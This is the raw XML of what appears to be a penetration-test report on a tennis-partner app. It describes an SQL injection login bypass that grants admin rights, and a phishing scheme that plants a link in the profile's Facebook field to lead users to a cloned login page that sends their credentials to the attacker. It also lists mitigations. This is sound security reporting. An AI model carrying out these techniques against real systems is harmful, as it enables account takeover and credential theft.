          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07723A7F" w14:textId="710BCF17" w:rsidR="00CD17CC" w:rsidRDefault="00CD17CC" w:rsidP="000C0EA2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We managed to login to the system successfully. The system logged us in with the first user in the user's table. Judging by our privileges </w:t>
      </w:r>
      <w:r w:rsidR="000C0EA2">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in the current dashboard, which allows us to delete games and users from the system, we can understand that we actually logged in with the admin's user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D148BEE" w14:textId="77777777" w:rsidR="000C0EA2" w:rsidRPr="00F94EEA" w:rsidRDefault="000C0EA2" w:rsidP="000C0EA2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A84EBE0" w14:textId="200709E2" w:rsidR="004312B3" w:rsidRPr="00F94EEA" w:rsidRDefault="004312B3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E5DCCA6" wp14:editId="4912F0CD">
            <wp:extent cx="4438650" cy="33528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35" r="51601" b="3857"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4438650" cy="3352800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="178407E8" w14:textId="585B5B3E" w:rsidR="004312B3" w:rsidRPr="00F94EEA" w:rsidRDefault="004312B3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6666A6A5" w14:textId="77777777" w:rsidR="004312B3" w:rsidRPr="00F94EEA" w:rsidRDefault="004312B3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6298384C" w14:textId="77777777" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299E0610" w14:textId="0859EB7C" w:rsidR="00707066" w:rsidRPr="00787602" w:rsidRDefault="00707066" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:lastRenderedPageBreak/>
        <w:t>Business impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD70512" w14:textId="3917C86C" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00C020A7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack can have devastating results, such as loss or theft of Data, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00407466" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>needless to say that</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00407466" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the data can be very sensitive, some of it can include information about clients and users, credit numbers, id numbers, emails passwords and more. </w:t>
      </w:r>
      <w:r w:rsidR="000C0EA2">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>An attacker</w:t>
      </w:r>
      <w:r w:rsidR="008C0A37">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, or a malicious user, </w:t>
      </w:r>
      <w:r w:rsidR="00407466" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>might also be able to wipe a whole table clean or erase the database structure, leaving the organization in a confusing mess.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB10F74" w14:textId="66B47CB0" w:rsidR="00707066" w:rsidRPr="00787602" w:rsidRDefault="00707066" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35206AA4" w14:textId="36B2179C" w:rsidR="00407466" w:rsidRPr="00F94EEA" w:rsidRDefault="00407466" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To minimize the chance of SQL injection attack</w:t>
      </w:r>
      <w:r w:rsidR="00506AB0" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, we can use a few different methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694081A7" w14:textId="5CC0F583"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Trust no one:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assume all user-submitted data is evil so use input validation via a function such as MySQL's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mysql_real_escape_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) to ensure that any dangerous characters such as ' are not passed to a SQL query in data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7197881D" w14:textId="598216B6"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Use appropriate privileges:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> Don't connect to your database using an account with admin-level privileges unless there is some compelling reason to do so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE170F" w14:textId="0F3DD23B" w:rsidR="00506AB0" w:rsidRPr="00F94EEA" w:rsidRDefault="00506AB0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Don't use dynamic SQL – don't construct queries with user input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> Even data sanitization routines can be flawed, so use prepared statements, parameterized queries or stored procedures instead whenever possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3973E9F7" w14:textId="180BAF25" w:rsidR="006403FD" w:rsidRDefault="00506AB0" w:rsidP="00E05C6A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Keep your secrets secret:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> Assume that your application is not secure and act accordingly by encrypting or hashing passwords and other confidential data, including connection strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134ACCAD" w14:textId="77777777" w:rsidR="00E05C6A" w:rsidRPr="00E05C6A" w:rsidRDefault="00E05C6A" w:rsidP="00E05C6A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EF62E1" w14:textId="6C695B29" w:rsidR="006403FD" w:rsidRPr="00787602" w:rsidRDefault="00DA39C5" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Phishing</w:t>
      </w:r>
      <w:r w:rsidR="006403FD" w:rsidRPr="00787602">
        <w:t xml:space="preserve"> redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA000A" w14:textId="4E282D5E" w:rsidR="006403FD" w:rsidRPr="00787602" w:rsidRDefault="006403FD" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F3F4C" w14:textId="0DD56F6E" w:rsidR="006403FD" w:rsidRPr="00F94EEA" w:rsidRDefault="006403FD" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Our team found an Open Redirection vulnerability in the application. Using the feature that allows users to upload a link to their Facebook page, a malicious user could upload a malicious link to a forged website that looks exactly like the original app's login page. That could help him fool users into thinking they should login again while handing him their login credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502075A0" w14:textId="51219FCF" w:rsidR="006403FD" w:rsidRPr="00787602" w:rsidRDefault="006403FD" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FCA20B" w14:textId="61539015" w:rsidR="006403FD" w:rsidRPr="00F94EEA" w:rsidRDefault="006403FD" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>First, a malicious user could upload his malicious link as his Facebook</w:t>
      </w:r>
      <w:r w:rsidR="00A76C0E" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'s profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> link. The feature </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>is located in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user's profile page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10FEE3" w14:textId="77777777" w:rsidR="006403FD" w:rsidRPr="00F94EEA" w:rsidRDefault="006403FD" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C96CBFA" w14:textId="77777777" w:rsidR="006403FD" w:rsidRPr="00F94EEA" w:rsidRDefault="006403FD" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185DD9D7" w14:textId="6D7A8F81" w:rsidR="006403FD"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11E02BE5" wp14:editId="41C1A1CE">
            <wp:extent cx="2943225" cy="315254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85" cy="3162789"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7001B305" w14:textId="412A0FA6" w:rsidR="006403FD" w:rsidRPr="00F94EEA" w:rsidRDefault="006403FD" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, </w:t>
      </w:r>
      <w:r w:rsidR="00A76C0E" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if another user will see this user's details in the search section that is located in the main dashboard, the malicious link will appear as a link to his Facebook profile, luring the user to click on it as he wants to see more details about this potential tennis partner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A721C2" w14:textId="6FB17840" w:rsidR="00A76C0E"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15847808" wp14:editId="15FD97C9">
            <wp:extent cx="3343275" cy="356235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3562350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="065F1CE0" w14:textId="44DBDF22" w:rsidR="00A76C0E" w:rsidRPr="00F94EEA" w:rsidRDefault="00A76C0E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>An innocent user might click on this link that will redirect him to a page that looks exactly like the original login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420BE8FA" w14:textId="1922F9C9" w:rsidR="00A76C0E"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7A4F8A4D" wp14:editId="3111F64F">
            <wp:extent cx="5274310" cy="2281555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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81555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD559A0" w14:textId="51E8451B" w:rsidR="00A76C0E" w:rsidRPr="00F94EEA" w:rsidRDefault="00A76C0E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AFF4A0" w14:textId="4FB1828C" w:rsidR="00A76C0E"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4B2C4B0E" wp14:editId="4AA89042">
            <wp:extent cx="5274310" cy="356933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69335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA08DA" w14:textId="60015112" w:rsidR="00A76C0E" w:rsidRPr="00F94EEA" w:rsidRDefault="00A76C0E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">An innocent user might think that in order to enter the link he </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>just clicked,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> he might need to enter his login credentials again. As soon as the details are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>submitted</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> they will make their way to the attackers server</w:t>
      </w:r>
      <w:r w:rsidR="008C6127" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, as seen below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187DADD" w14:textId="77777777" w:rsidR="008C6127" w:rsidRPr="00F94EEA" w:rsidRDefault="008C6127" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:keepNext/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D4A445" wp14:editId="3FAEEF8A">
            <wp:extent cx="4981575" cy="110490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1104900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D90158D" w14:textId="08720402" w:rsidR="008C6127" w:rsidRPr="00F94EEA" w:rsidRDefault="008C6127" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the malicious script that will send the login credential to the attacker's server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4517838B" w14:textId="77777777" w:rsidR="00830ED1" w:rsidRDefault="008C6127" w:rsidP="00830ED1">
      <w:pPr>
        <w:keepNext/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FB705C" wp14:editId="37FA7F10">
            <wp:extent cx="5274310" cy="496570"/>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6570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910769A" w14:textId="45CB20FA" w:rsidR="008C6127" w:rsidRPr="00187CC3" w:rsidRDefault="00830ED1" w:rsidP="00830ED1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187CC3">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the user's credentials shown in the attacker's server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C0895" w14:textId="5D390457" w:rsidR="008C6127" w:rsidRPr="00F94EEA" w:rsidRDefault="008C6127" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The user will then enter his main dashboard again, not knowing that he his credentials were just compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F686EAB" w14:textId="6C42769E" w:rsidR="008C6127" w:rsidRPr="00F94EEA" w:rsidRDefault="008C6127" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:t>Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCD73B3" w14:textId="537DF8E6" w:rsidR="008C6127" w:rsidRPr="00F94EEA" w:rsidRDefault="008C6127" w:rsidP="00E4025C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Allows phishing attacks </w:t>
      </w:r>
      <w:r w:rsidR="00F10D33" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>on the app's users, leaving them vulnerable, and therefore leaving the whole platform vulnerable as well.</w:t>
      </w:r>
    </w:p>
